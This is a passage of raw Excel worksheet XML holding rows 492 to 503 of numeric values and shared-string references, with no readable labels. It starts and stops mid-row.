      </c>
      <c r="AO492">
        <v>2000</v>
      </c>
      <c r="AP492">
        <v>82133336738</v>
      </c>
      <c r="AQ492">
        <v>82133336738</v>
      </c>
      <c r="AR492" t="s">
        <v>3981</v>
      </c>
      <c r="AS492" t="s">
        <v>71</v>
      </c>
      <c r="AT492" t="s">
        <v>72</v>
      </c>
      <c r="AU492">
        <v>25</v>
      </c>
      <c r="AV492">
        <v>2</v>
      </c>
      <c r="AW492">
        <v>0</v>
      </c>
      <c r="AX492">
        <v>2</v>
      </c>
      <c r="AY492">
        <v>1</v>
      </c>
      <c r="AZ492">
        <v>6</v>
      </c>
      <c r="BA492">
        <v>0</v>
      </c>
      <c r="BB492" t="s">
        <v>15037</v>
      </c>
      <c r="BC492" t="s">
        <v>9477</v>
      </c>
      <c r="BD492">
        <v>0</v>
      </c>
    </row>
    <row r="493" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A493">
        <v>1302</v>
      </c>
      <c r="B493" t="s">
        <v>3985</v>
      </c>
      <c r="C493" t="s">
        <v>60</v>
      </c>
      <c r="D493" t="s">
        <v>3986</v>
      </c>
      <c r="E493" t="s">
        <v>528</v>
      </c>
      <c r="F493" t="s">
        <v>3987</v>
      </c>
      <c r="G493" s="1">
        <v>44207</v>
      </c>
      <c r="H493">
        <v>7933</v>
      </c>
      <c r="I493">
        <v>7933</v>
      </c>
      <c r="J493">
        <v>0</v>
      </c>
      <c r="K493">
        <v>0</v>
      </c>
      <c r="L493">
        <v>0</v>
      </c>
      <c r="M493">
        <v>0</v>
      </c>
      <c r="N493">
        <v>0</v>
      </c>
      <c r="O493">
        <v>0</v>
      </c>
      <c r="P493">
        <v>0</v>
      </c>
      <c r="Q493">
        <v>1</v>
      </c>
      <c r="R493">
        <v>1</v>
      </c>
      <c r="S493">
        <v>0</v>
      </c>
      <c r="T493">
        <v>0</v>
      </c>
      <c r="U493">
        <v>0</v>
      </c>
      <c r="V493">
        <v>0</v>
      </c>
      <c r="W493">
        <v>0</v>
      </c>
      <c r="X493">
        <v>0</v>
      </c>
      <c r="Y493">
        <v>0</v>
      </c>
      <c r="Z493">
        <v>0</v>
      </c>
      <c r="AA493">
        <v>0</v>
      </c>
      <c r="AB493">
        <v>50</v>
      </c>
      <c r="AC493">
        <v>50</v>
      </c>
      <c r="AD493">
        <v>0</v>
      </c>
      <c r="AE493">
        <v>0</v>
      </c>
      <c r="AF493" t="s">
        <v>3988</v>
      </c>
      <c r="AG493">
        <v>35375</v>
      </c>
      <c r="AH493">
        <v>10</v>
      </c>
      <c r="AJ493">
        <v>135</v>
      </c>
      <c r="AK493" t="s">
        <v>3989</v>
      </c>
      <c r="AL493" t="s">
        <v>3989</v>
      </c>
      <c r="AM493" t="s">
        <v>3990</v>
      </c>
      <c r="AN493" t="s">
        <v>68</v>
      </c>
      <c r="AO493">
        <v>2011</v>
      </c>
      <c r="AP493">
        <v>85377865186</v>
      </c>
      <c r="AQ493" t="s">
        <v>3991</v>
      </c>
      <c r="AR493" t="s">
        <v>3988</v>
      </c>
      <c r="AS493" t="s">
        <v>71</v>
      </c>
      <c r="AT493" t="s">
        <v>72</v>
      </c>
      <c r="AU493">
        <v>20</v>
      </c>
      <c r="AV493">
        <v>0</v>
      </c>
      <c r="AW493">
        <v>0</v>
      </c>
      <c r="AX493">
        <v>0</v>
      </c>
      <c r="AY493">
        <v>0</v>
      </c>
      <c r="AZ493">
        <v>5</v>
      </c>
      <c r="BA493">
        <v>0</v>
      </c>
      <c r="BB493" t="s">
        <v>15184</v>
      </c>
      <c r="BC493" t="s">
        <v>12808</v>
      </c>
      <c r="BD493">
        <v>0</v>
      </c>
    </row>
    <row r="494" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A494">
        <v>1321</v>
      </c>
      <c r="B494" t="s">
        <v>3992</v>
      </c>
      <c r="C494" t="s">
        <v>99</v>
      </c>
      <c r="D494" t="s">
        <v>3993</v>
      </c>
      <c r="E494" t="s">
        <v>1597</v>
      </c>
      <c r="F494" t="s">
        <v>3994</v>
      </c>
      <c r="G494" s="1">
        <v>44267</v>
      </c>
      <c r="H494">
        <v>7940</v>
      </c>
      <c r="I494">
        <v>7940</v>
      </c>
      <c r="J494">
        <v>1</v>
      </c>
      <c r="K494">
        <v>1</v>
      </c>
      <c r="L494">
        <v>0</v>
      </c>
      <c r="M494">
        <v>0</v>
      </c>
      <c r="N494">
        <v>0</v>
      </c>
      <c r="O494">
        <v>0</v>
      </c>
      <c r="P494">
        <v>0</v>
      </c>
      <c r="Q494">
        <v>5</v>
      </c>
      <c r="R494">
        <v>3</v>
      </c>
      <c r="S494">
        <v>1</v>
      </c>
      <c r="T494">
        <v>1</v>
      </c>
      <c r="U494">
        <v>111000</v>
      </c>
      <c r="V494">
        <v>1</v>
      </c>
      <c r="W494">
        <v>0</v>
      </c>
      <c r="X494">
        <v>0</v>
      </c>
      <c r="Y494">
        <v>0</v>
      </c>
      <c r="Z494">
        <v>0</v>
      </c>
      <c r="AA494">
        <v>0</v>
      </c>
      <c r="AB494">
        <v>500</v>
      </c>
      <c r="AC494">
        <v>300</v>
      </c>
      <c r="AD494">
        <v>1</v>
      </c>
      <c r="AE494">
        <v>2000</v>
      </c>
      <c r="AF494" t="s">
        <v>3995</v>
      </c>
      <c r="AG494">
        <v>14470</v>
      </c>
      <c r="AH494">
        <v>12</v>
      </c>
      <c r="AJ494">
        <v>160</v>
      </c>
      <c r="AK494" t="s">
        <v>114</v>
      </c>
      <c r="AL494" t="s">
        <v>3996</v>
      </c>
      <c r="AM494" t="s">
        <v>3997</v>
      </c>
      <c r="AN494" t="s">
        <v>55</v>
      </c>
      <c r="AO494">
        <v>2016</v>
      </c>
      <c r="AP494" t="s">
        <v>3998</v>
      </c>
      <c r="AQ494" t="s">
        <v>3999</v>
      </c>
      <c r="AR494" t="s">
        <v>3995</v>
      </c>
      <c r="AS494" t="s">
        <v>179</v>
      </c>
      <c r="AT494" t="s">
        <v>58</v>
      </c>
      <c r="AU494">
        <v>24</v>
      </c>
      <c r="AV494">
        <v>0</v>
      </c>
      <c r="AW494">
        <v>4</v>
      </c>
      <c r="AX494">
        <v>2</v>
      </c>
      <c r="AY494">
        <v>10</v>
      </c>
      <c r="AZ494">
        <v>10</v>
      </c>
      <c r="BA494" t="s">
        <v>16846</v>
      </c>
      <c r="BB494" t="s">
        <v>15200</v>
      </c>
      <c r="BC494" t="s">
        <v>10031</v>
      </c>
      <c r="BD494">
        <v>0</v>
      </c>
    </row>
    <row r="495" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A495">
        <v>1375</v>
      </c>
      <c r="B495" t="s">
        <v>4000</v>
      </c>
      <c r="C495" t="s">
        <v>88</v>
      </c>
      <c r="D495" t="s">
        <v>4001</v>
      </c>
      <c r="E495" t="s">
        <v>111</v>
      </c>
      <c r="F495" t="s">
        <v>4002</v>
      </c>
      <c r="G495" s="1">
        <v>44229</v>
      </c>
      <c r="H495">
        <v>7981</v>
      </c>
      <c r="I495">
        <v>7981</v>
      </c>
      <c r="J495">
        <v>1</v>
      </c>
      <c r="K495">
        <v>1</v>
      </c>
      <c r="L495">
        <v>1</v>
      </c>
      <c r="M495">
        <v>0</v>
      </c>
      <c r="N495">
        <v>0</v>
      </c>
      <c r="O495">
        <v>0</v>
      </c>
      <c r="P495">
        <v>0</v>
      </c>
      <c r="Q495">
        <v>0</v>
      </c>
      <c r="R495">
        <v>9</v>
      </c>
      <c r="S495">
        <v>0</v>
      </c>
      <c r="T495">
        <v>0</v>
      </c>
      <c r="U495">
        <v>7000</v>
      </c>
      <c r="V495">
        <v>3000</v>
      </c>
      <c r="W495">
        <v>7000</v>
      </c>
      <c r="X495">
        <v>0</v>
      </c>
      <c r="Y495">
        <v>0</v>
      </c>
      <c r="Z495">
        <v>0</v>
      </c>
      <c r="AA495">
        <v>0</v>
      </c>
      <c r="AB495">
        <v>0</v>
      </c>
      <c r="AC495">
        <v>1350</v>
      </c>
      <c r="AD495">
        <v>0</v>
      </c>
      <c r="AE495">
        <v>0</v>
      </c>
      <c r="AF495" t="s">
        <v>4003</v>
      </c>
      <c r="AG495">
        <v>80225</v>
      </c>
      <c r="AH495">
        <v>17</v>
      </c>
      <c r="AJ495">
        <v>282</v>
      </c>
      <c r="AK495" t="s">
        <v>592</v>
      </c>
      <c r="AL495" t="s">
        <v>593</v>
      </c>
      <c r="AM495" t="s">
        <v>4004</v>
      </c>
      <c r="AN495" t="s">
        <v>55</v>
      </c>
      <c r="AO495">
        <v>2001</v>
      </c>
      <c r="AP495">
        <v>361242441</v>
      </c>
      <c r="AQ495" t="s">
        <v>4005</v>
      </c>
      <c r="AR495" t="s">
        <v>4003</v>
      </c>
      <c r="AS495" t="s">
        <v>71</v>
      </c>
      <c r="AT495" t="s">
        <v>58</v>
      </c>
      <c r="AU495">
        <v>24</v>
      </c>
      <c r="AV495">
        <v>1</v>
      </c>
      <c r="AW495">
        <v>0</v>
      </c>
      <c r="AX495">
        <v>0</v>
      </c>
      <c r="AY495">
        <v>20</v>
      </c>
      <c r="AZ495">
        <v>3</v>
      </c>
      <c r="BA495" t="s">
        <v>16863</v>
      </c>
      <c r="BB495" t="s">
        <v>15234</v>
      </c>
      <c r="BC495" t="s">
        <v>12942</v>
      </c>
      <c r="BD495" t="s">
        <v>12943</v>
      </c>
    </row>
    <row r="496" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A496">
        <v>1311</v>
      </c>
      <c r="B496" t="s">
        <v>4006</v>
      </c>
      <c r="C496" t="s">
        <v>318</v>
      </c>
      <c r="D496" t="s">
        <v>4007</v>
      </c>
      <c r="E496" t="s">
        <v>363</v>
      </c>
      <c r="F496" t="s">
        <v>364</v>
      </c>
      <c r="G496" s="1">
        <v>44250</v>
      </c>
      <c r="H496">
        <v>8045</v>
      </c>
      <c r="I496">
        <v>8045</v>
      </c>
      <c r="J496">
        <v>0</v>
      </c>
      <c r="K496">
        <v>0</v>
      </c>
      <c r="L496">
        <v>0</v>
      </c>
      <c r="M496">
        <v>0</v>
      </c>
      <c r="N496">
        <v>0</v>
      </c>
      <c r="O496">
        <v>0</v>
      </c>
      <c r="P496">
        <v>0</v>
      </c>
      <c r="Q496">
        <v>0</v>
      </c>
      <c r="R496">
        <v>0</v>
      </c>
      <c r="S496">
        <v>0</v>
      </c>
      <c r="T496">
        <v>1</v>
      </c>
      <c r="U496">
        <v>0</v>
      </c>
      <c r="V496">
        <v>0</v>
      </c>
      <c r="W496">
        <v>0</v>
      </c>
      <c r="X496">
        <v>0</v>
      </c>
      <c r="Y496">
        <v>0</v>
      </c>
      <c r="Z496">
        <v>0</v>
      </c>
      <c r="AA496">
        <v>0</v>
      </c>
      <c r="AB496">
        <v>0</v>
      </c>
      <c r="AC496">
        <v>0</v>
      </c>
      <c r="AD496">
        <v>0</v>
      </c>
      <c r="AE496">
        <v>0</v>
      </c>
      <c r="AF496" t="s">
        <v>4008</v>
      </c>
      <c r="AG496">
        <v>90241</v>
      </c>
      <c r="AH496">
        <v>26</v>
      </c>
      <c r="AJ496">
        <v>420</v>
      </c>
      <c r="AK496" t="s">
        <v>4009</v>
      </c>
      <c r="AL496" t="s">
        <v>4010</v>
      </c>
      <c r="AM496" t="s">
        <v>4011</v>
      </c>
      <c r="AN496" t="s">
        <v>68</v>
      </c>
      <c r="AO496">
        <v>1999</v>
      </c>
      <c r="AP496" t="s">
        <v>4012</v>
      </c>
      <c r="AQ496" t="s">
        <v>4013</v>
      </c>
      <c r="AR496" t="s">
        <v>4014</v>
      </c>
      <c r="AS496" t="s">
        <v>371</v>
      </c>
      <c r="AT496" t="s">
        <v>72</v>
      </c>
      <c r="AU496">
        <v>6</v>
      </c>
      <c r="AV496">
        <v>0</v>
      </c>
      <c r="AW496">
        <v>7</v>
      </c>
      <c r="AX496">
        <v>3</v>
      </c>
      <c r="AY496">
        <v>6</v>
      </c>
      <c r="AZ496">
        <v>4</v>
      </c>
      <c r="BA496" t="s">
        <v>17628</v>
      </c>
      <c r="BB496" t="s">
        <v>15191</v>
      </c>
      <c r="BC496" t="s">
        <v>9952</v>
      </c>
      <c r="BD496" t="s">
        <v>11181</v>
      </c>
    </row>
    <row r="497" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A497">
        <v>1195</v>
      </c>
      <c r="B497" t="s">
        <v>4015</v>
      </c>
      <c r="C497" t="s">
        <v>157</v>
      </c>
      <c r="D497" t="s">
        <v>4016</v>
      </c>
      <c r="E497" t="s">
        <v>142</v>
      </c>
      <c r="F497" t="s">
        <v>4017</v>
      </c>
      <c r="G497" s="1">
        <v>44223</v>
      </c>
      <c r="H497">
        <v>8102</v>
      </c>
      <c r="I497">
        <v>8102</v>
      </c>
      <c r="J497">
        <v>1</v>
      </c>
      <c r="K497">
        <v>1</v>
      </c>
      <c r="L497">
        <v>2</v>
      </c>
      <c r="M497">
        <v>1</v>
      </c>
      <c r="N497">
        <v>0</v>
      </c>
      <c r="O497">
        <v>0</v>
      </c>
      <c r="P497">
        <v>0</v>
      </c>
      <c r="Q497">
        <v>0</v>
      </c>
      <c r="R497">
        <v>0</v>
      </c>
      <c r="S497">
        <v>0</v>
      </c>
      <c r="T497">
        <v>0</v>
      </c>
      <c r="U497">
        <v>100000</v>
      </c>
      <c r="V497">
        <v>25000</v>
      </c>
      <c r="W497">
        <v>7000</v>
      </c>
      <c r="X497">
        <v>200</v>
      </c>
      <c r="Y497">
        <v>0</v>
      </c>
      <c r="Z497">
        <v>0</v>
      </c>
      <c r="AA497">
        <v>0</v>
      </c>
      <c r="AB497">
        <v>0</v>
      </c>
      <c r="AC497">
        <v>0</v>
      </c>
      <c r="AD497">
        <v>0</v>
      </c>
      <c r="AE497">
        <v>0</v>
      </c>
      <c r="AF497" t="s">
        <v>4018</v>
      </c>
      <c r="AG497">
        <v>62352</v>
      </c>
      <c r="AH497">
        <v>16</v>
      </c>
      <c r="AJ497">
        <v>250</v>
      </c>
      <c r="AK497" t="s">
        <v>1870</v>
      </c>
      <c r="AL497" t="s">
        <v>4019</v>
      </c>
      <c r="AM497" t="s">
        <v>4020</v>
      </c>
      <c r="AN497" t="s">
        <v>55</v>
      </c>
      <c r="AO497">
        <v>2001</v>
      </c>
      <c r="AP497" t="s">
        <v>4021</v>
      </c>
      <c r="AQ497" t="s">
        <v>4022</v>
      </c>
      <c r="AR497" t="s">
        <v>4023</v>
      </c>
      <c r="AS497" t="s">
        <v>71</v>
      </c>
      <c r="AT497" t="s">
        <v>58</v>
      </c>
      <c r="AU497">
        <v>26</v>
      </c>
      <c r="AV497">
        <v>1</v>
      </c>
      <c r="AW497">
        <v>5</v>
      </c>
      <c r="AX497">
        <v>16</v>
      </c>
      <c r="AY497">
        <v>6</v>
      </c>
      <c r="AZ497">
        <v>2</v>
      </c>
      <c r="BA497" t="s">
        <v>16817</v>
      </c>
      <c r="BB497" t="s">
        <v>15114</v>
      </c>
      <c r="BC497">
        <v>0</v>
      </c>
      <c r="BD497" t="s">
        <v>12767</v>
      </c>
    </row>
    <row r="498" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A498">
        <v>1518</v>
      </c>
      <c r="B498" t="s">
        <v>4024</v>
      </c>
      <c r="C498" t="s">
        <v>318</v>
      </c>
      <c r="D498" t="s">
        <v>4025</v>
      </c>
      <c r="E498" t="s">
        <v>4026</v>
      </c>
      <c r="F498" t="s">
        <v>4027</v>
      </c>
      <c r="G498" s="1">
        <v>44271</v>
      </c>
      <c r="H498">
        <v>8108</v>
      </c>
      <c r="I498">
        <v>8108</v>
      </c>
      <c r="J498">
        <v>0</v>
      </c>
      <c r="K498">
        <v>0</v>
      </c>
      <c r="L498">
        <v>0</v>
      </c>
      <c r="M498">
        <v>0</v>
      </c>
      <c r="N498">
        <v>0</v>
      </c>
      <c r="O498">
        <v>0</v>
      </c>
      <c r="P498">
        <v>0</v>
      </c>
      <c r="Q498">
        <v>3</v>
      </c>
      <c r="R498">
        <v>0</v>
      </c>
      <c r="S498">
        <v>0</v>
      </c>
      <c r="T498">
        <v>2</v>
      </c>
      <c r="U498">
        <v>0</v>
      </c>
      <c r="V498">
        <v>0</v>
      </c>
      <c r="W498">
        <v>0</v>
      </c>
      <c r="X498">
        <v>0</v>
      </c>
      <c r="Y498">
        <v>0</v>
      </c>
      <c r="Z498">
        <v>0</v>
      </c>
      <c r="AA498">
        <v>0</v>
      </c>
      <c r="AB498">
        <v>1100</v>
      </c>
      <c r="AC498">
        <v>0</v>
      </c>
      <c r="AD498">
        <v>0</v>
      </c>
      <c r="AE498">
        <v>440000</v>
      </c>
      <c r="AF498" t="s">
        <v>4028</v>
      </c>
      <c r="AG498">
        <v>0</v>
      </c>
      <c r="AH498">
        <v>26</v>
      </c>
      <c r="AJ498">
        <v>403</v>
      </c>
      <c r="AK498" t="s">
        <v>4029</v>
      </c>
      <c r="AL498" t="s">
        <v>4030</v>
      </c>
      <c r="AM498" t="s">
        <v>4031</v>
      </c>
      <c r="AN498" t="s">
        <v>55</v>
      </c>
      <c r="AO498">
        <v>2002</v>
      </c>
      <c r="AP498" t="s">
        <v>4032</v>
      </c>
      <c r="AQ498" t="s">
        <v>4033</v>
      </c>
      <c r="AR498" t="s">
        <v>4034</v>
      </c>
      <c r="AS498" t="s">
        <v>71</v>
      </c>
      <c r="AT498" t="s">
        <v>58</v>
      </c>
      <c r="AU498">
        <v>25</v>
      </c>
      <c r="AV498">
        <v>2</v>
      </c>
      <c r="AW498">
        <v>24</v>
      </c>
      <c r="AX498">
        <v>6</v>
      </c>
      <c r="AY498">
        <v>41</v>
      </c>
      <c r="AZ498">
        <v>3</v>
      </c>
      <c r="BA498" t="s">
        <v>16924</v>
      </c>
      <c r="BB498" t="s">
        <v>16923</v>
      </c>
      <c r="BC498">
        <v>0</v>
      </c>
      <c r="BD498" t="s">
        <v>11948</v>
      </c>
    </row>
    <row r="499" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A499">
        <v>1443</v>
      </c>
      <c r="B499" t="s">
        <v>4035</v>
      </c>
      <c r="C499" t="s">
        <v>157</v>
      </c>
      <c r="D499" t="s">
        <v>4036</v>
      </c>
      <c r="E499" t="s">
        <v>363</v>
      </c>
      <c r="F499" t="s">
        <v>4037</v>
      </c>
      <c r="G499" s="1">
        <v>44298</v>
      </c>
      <c r="H499">
        <v>8133</v>
      </c>
      <c r="I499">
        <v>8133</v>
      </c>
      <c r="J499">
        <v>0</v>
      </c>
      <c r="K499">
        <v>1</v>
      </c>
      <c r="L499">
        <v>0</v>
      </c>
      <c r="M499">
        <v>0</v>
      </c>
      <c r="N499">
        <v>0</v>
      </c>
      <c r="O499">
        <v>0</v>
      </c>
      <c r="P499">
        <v>0</v>
      </c>
      <c r="Q499">
        <v>0</v>
      </c>
      <c r="R499">
        <v>3</v>
      </c>
      <c r="S499">
        <v>0</v>
      </c>
      <c r="T499">
        <v>1</v>
      </c>
      <c r="U499">
        <v>0</v>
      </c>
      <c r="V499">
        <v>800</v>
      </c>
      <c r="W499">
        <v>0</v>
      </c>
      <c r="X499">
        <v>0</v>
      </c>
      <c r="Y499">
        <v>0</v>
      </c>
      <c r="Z499">
        <v>0</v>
      </c>
      <c r="AA499">
        <v>0</v>
      </c>
      <c r="AB499">
        <v>0</v>
      </c>
      <c r="AC499">
        <v>800</v>
      </c>
      <c r="AD499">
        <v>0</v>
      </c>
      <c r="AE499">
        <v>32000</v>
      </c>
      <c r="AF499" t="s">
        <v>4038</v>
      </c>
      <c r="AG499">
        <v>61219</v>
      </c>
      <c r="AH499">
        <v>16</v>
      </c>
      <c r="AJ499">
        <v>242</v>
      </c>
      <c r="AK499" t="s">
        <v>1894</v>
      </c>
      <c r="AL499" t="s">
        <v>1895</v>
      </c>
      <c r="AM499" t="s">
        <v>4039</v>
      </c>
      <c r="AN499" t="s">
        <v>55</v>
      </c>
      <c r="AO499">
        <v>1965</v>
      </c>
      <c r="AP499" t="s">
        <v>4040</v>
      </c>
      <c r="AQ499" t="s">
        <v>4041</v>
      </c>
      <c r="AR499" t="s">
        <v>4042</v>
      </c>
      <c r="AS499" t="s">
        <v>71</v>
      </c>
      <c r="AT499" t="s">
        <v>58</v>
      </c>
      <c r="AU499">
        <v>25</v>
      </c>
      <c r="AV499">
        <v>2</v>
      </c>
      <c r="AW499">
        <v>12</v>
      </c>
      <c r="AX499">
        <v>10</v>
      </c>
      <c r="AY499">
        <v>2</v>
      </c>
      <c r="AZ499">
        <v>2</v>
      </c>
      <c r="BA499" t="s">
        <v>16892</v>
      </c>
      <c r="BB499" t="s">
        <v>15279</v>
      </c>
      <c r="BC499">
        <v>0</v>
      </c>
      <c r="BD499" t="s">
        <v>12778</v>
      </c>
    </row>
    <row r="500" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A500">
        <v>1312</v>
      </c>
      <c r="B500" t="s">
        <v>4043</v>
      </c>
      <c r="C500" t="s">
        <v>168</v>
      </c>
      <c r="D500" t="s">
        <v>4044</v>
      </c>
      <c r="E500" t="s">
        <v>142</v>
      </c>
      <c r="F500" t="s">
        <v>4045</v>
      </c>
      <c r="G500" s="1">
        <v>44371</v>
      </c>
      <c r="H500">
        <v>8143</v>
      </c>
      <c r="I500">
        <v>8143</v>
      </c>
      <c r="J500">
        <v>1</v>
      </c>
      <c r="K500">
        <v>0</v>
      </c>
      <c r="L500">
        <v>0</v>
      </c>
      <c r="M500">
        <v>0</v>
      </c>
      <c r="N500">
        <v>0</v>
      </c>
      <c r="O500">
        <v>0</v>
      </c>
      <c r="P500">
        <v>0</v>
      </c>
      <c r="Q500">
        <v>0</v>
      </c>
      <c r="R500">
        <v>0</v>
      </c>
      <c r="S500">
        <v>0</v>
      </c>
      <c r="T500">
        <v>0</v>
      </c>
      <c r="U500">
        <v>925000</v>
      </c>
      <c r="V500">
        <v>0</v>
      </c>
      <c r="W500">
        <v>0</v>
      </c>
      <c r="X500">
        <v>0</v>
      </c>
      <c r="Y500">
        <v>0</v>
      </c>
      <c r="Z500">
        <v>0</v>
      </c>
      <c r="AA500">
        <v>0</v>
      </c>
      <c r="AB500">
        <v>0</v>
      </c>
      <c r="AC500">
        <v>0</v>
      </c>
      <c r="AD500">
        <v>0</v>
      </c>
      <c r="AE500">
        <v>0</v>
      </c>
      <c r="AF500" t="s">
        <v>4046</v>
      </c>
      <c r="AG500">
        <v>17530</v>
      </c>
      <c r="AH500">
        <v>13</v>
      </c>
      <c r="AJ500">
        <v>176</v>
      </c>
      <c r="AK500" t="s">
        <v>2872</v>
      </c>
      <c r="AL500" t="s">
        <v>4047</v>
      </c>
      <c r="AM500" t="s">
        <v>4048</v>
      </c>
      <c r="AN500" t="s">
        <v>82</v>
      </c>
      <c r="AO500">
        <v>2004</v>
      </c>
      <c r="AP500" t="s">
        <v>4049</v>
      </c>
      <c r="AQ500">
        <v>8521193231</v>
      </c>
      <c r="AR500" t="s">
        <v>4046</v>
      </c>
      <c r="AS500" t="s">
        <v>179</v>
      </c>
      <c r="AT500" t="s">
        <v>86</v>
      </c>
      <c r="AU500">
        <v>25</v>
      </c>
      <c r="AV500">
        <v>1</v>
      </c>
      <c r="AW500">
        <v>0</v>
      </c>
      <c r="AX500">
        <v>0</v>
      </c>
      <c r="AY500">
        <v>14</v>
      </c>
      <c r="AZ500">
        <v>2</v>
      </c>
      <c r="BA500" t="s">
        <v>16845</v>
      </c>
      <c r="BB500" t="s">
        <v>15192</v>
      </c>
      <c r="BC500" t="s">
        <v>14079</v>
      </c>
      <c r="BD500">
        <v>0</v>
      </c>
    </row>
    <row r="501" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A501">
        <v>1404</v>
      </c>
      <c r="B501" t="s">
        <v>4050</v>
      </c>
      <c r="C501" t="s">
        <v>579</v>
      </c>
      <c r="D501" t="s">
        <v>4051</v>
      </c>
      <c r="E501" t="s">
        <v>111</v>
      </c>
      <c r="F501" t="s">
        <v>4052</v>
      </c>
      <c r="G501" s="1">
        <v>44242</v>
      </c>
      <c r="H501">
        <v>8215</v>
      </c>
      <c r="I501">
        <v>8215</v>
      </c>
      <c r="J501">
        <v>1</v>
      </c>
      <c r="K501">
        <v>0</v>
      </c>
      <c r="L501">
        <v>1</v>
      </c>
      <c r="M501">
        <v>3</v>
      </c>
      <c r="N501">
        <v>0</v>
      </c>
      <c r="O501">
        <v>0</v>
      </c>
      <c r="P501">
        <v>0</v>
      </c>
      <c r="Q501">
        <v>0</v>
      </c>
      <c r="R501">
        <v>30</v>
      </c>
      <c r="S501">
        <v>0</v>
      </c>
      <c r="T501">
        <v>0</v>
      </c>
      <c r="U501">
        <v>100000</v>
      </c>
      <c r="V501">
        <v>0</v>
      </c>
      <c r="W501">
        <v>5000</v>
      </c>
      <c r="X501">
        <v>2400</v>
      </c>
      <c r="Y501">
        <v>0</v>
      </c>
      <c r="Z501">
        <v>0</v>
      </c>
      <c r="AA501">
        <v>0</v>
      </c>
      <c r="AB501">
        <v>0</v>
      </c>
      <c r="AC501">
        <v>1200</v>
      </c>
      <c r="AD501">
        <v>0</v>
      </c>
      <c r="AE501">
        <v>0</v>
      </c>
      <c r="AF501" t="s">
        <v>4053</v>
      </c>
      <c r="AG501">
        <v>76114</v>
      </c>
      <c r="AH501">
        <v>23</v>
      </c>
      <c r="AJ501">
        <v>363</v>
      </c>
      <c r="AK501" t="s">
        <v>4054</v>
      </c>
      <c r="AL501" t="s">
        <v>4055</v>
      </c>
      <c r="AM501" t="s">
        <v>4056</v>
      </c>
      <c r="AN501" t="s">
        <v>55</v>
      </c>
      <c r="AO501">
        <v>2016</v>
      </c>
      <c r="AP501" t="s">
        <v>4057</v>
      </c>
      <c r="AQ501" t="s">
        <v>4058</v>
      </c>
      <c r="AR501" t="s">
        <v>4059</v>
      </c>
      <c r="AS501" t="s">
        <v>71</v>
      </c>
      <c r="AT501" t="s">
        <v>58</v>
      </c>
      <c r="AU501">
        <v>6</v>
      </c>
      <c r="AV501">
        <v>0</v>
      </c>
      <c r="AW501">
        <v>23</v>
      </c>
      <c r="AX501">
        <v>5</v>
      </c>
      <c r="AY501">
        <v>2</v>
      </c>
      <c r="AZ501">
        <v>2</v>
      </c>
      <c r="BA501" t="s">
        <v>16875</v>
      </c>
      <c r="BB501" t="s">
        <v>15253</v>
      </c>
      <c r="BC501" t="s">
        <v>12854</v>
      </c>
      <c r="BD501" t="s">
        <v>12855</v>
      </c>
    </row>
    <row r="502" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A502">
        <v>1388</v>
      </c>
      <c r="B502" t="s">
        <v>4060</v>
      </c>
      <c r="C502" t="s">
        <v>47</v>
      </c>
      <c r="D502" t="s">
        <v>4061</v>
      </c>
      <c r="E502" t="s">
        <v>142</v>
      </c>
      <c r="F502" t="s">
        <v>4062</v>
      </c>
      <c r="G502" s="1">
        <v>44287</v>
      </c>
      <c r="H502">
        <v>8232</v>
      </c>
      <c r="I502">
        <v>8232</v>
      </c>
      <c r="J502">
        <v>4</v>
      </c>
      <c r="K502">
        <v>0</v>
      </c>
      <c r="L502">
        <v>6</v>
      </c>
      <c r="M502">
        <v>0</v>
      </c>
      <c r="N502">
        <v>0</v>
      </c>
      <c r="O502">
        <v>0</v>
      </c>
      <c r="P502">
        <v>0</v>
      </c>
      <c r="Q502">
        <v>0</v>
      </c>
      <c r="R502">
        <v>30</v>
      </c>
      <c r="S502">
        <v>3</v>
      </c>
      <c r="T502">
        <v>0</v>
      </c>
      <c r="U502">
        <v>13000</v>
      </c>
      <c r="V502">
        <v>0</v>
      </c>
      <c r="W502">
        <v>15000</v>
      </c>
      <c r="X502">
        <v>0</v>
      </c>
      <c r="Y502">
        <v>0</v>
      </c>
      <c r="Z502">
        <v>0</v>
      </c>
      <c r="AA502">
        <v>0</v>
      </c>
      <c r="AB502">
        <v>0</v>
      </c>
      <c r="AC502">
        <v>18000</v>
      </c>
      <c r="AD502">
        <v>3600</v>
      </c>
      <c r="AE502">
        <v>0</v>
      </c>
      <c r="AF502" t="s">
        <v>4063</v>
      </c>
      <c r="AG502">
        <v>22652</v>
      </c>
      <c r="AH502">
        <v>2</v>
      </c>
      <c r="AJ502">
        <v>27</v>
      </c>
      <c r="AK502" t="s">
        <v>2607</v>
      </c>
      <c r="AL502" t="s">
        <v>2608</v>
      </c>
      <c r="AM502" t="s">
        <v>4064</v>
      </c>
      <c r="AN502" t="s">
        <v>55</v>
      </c>
      <c r="AO502">
        <v>1994</v>
      </c>
      <c r="AP502" t="s">
        <v>4065</v>
      </c>
      <c r="AQ502" t="s">
        <v>4066</v>
      </c>
      <c r="AR502" t="s">
        <v>3364</v>
      </c>
      <c r="AS502" t="s">
        <v>71</v>
      </c>
      <c r="AT502" t="s">
        <v>58</v>
      </c>
      <c r="AU502">
        <v>0</v>
      </c>
      <c r="AV502">
        <v>0</v>
      </c>
      <c r="AW502">
        <v>56</v>
      </c>
      <c r="AX502">
        <v>201</v>
      </c>
      <c r="AY502">
        <v>11</v>
      </c>
      <c r="AZ502">
        <v>4</v>
      </c>
      <c r="BA502" t="s">
        <v>16869</v>
      </c>
      <c r="BB502" t="s">
        <v>15245</v>
      </c>
      <c r="BC502" t="s">
        <v>9603</v>
      </c>
      <c r="BD502">
        <v>0</v>
      </c>
    </row>
    <row r="503" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A503">
        <v>1418</v>
      </c>
      <c r="B503" t="s">
        <v>4067</v>
      </c>
      <c r="C503" t="s">
        <v>157</v>
      </c>
      <c r="D503" t="s">
        <v>4068</v>
      </c>
      <c r="E503" t="s">
        <v>131</v>
      </c>
      <c r="F503" t="s">
        <v>4069</v>
      </c>
      <c r="G503" s="1">
        <v>44223</v>
      </c>
      <c r="H503">
        <v>8242</v>
      </c>
      <c r="I503">
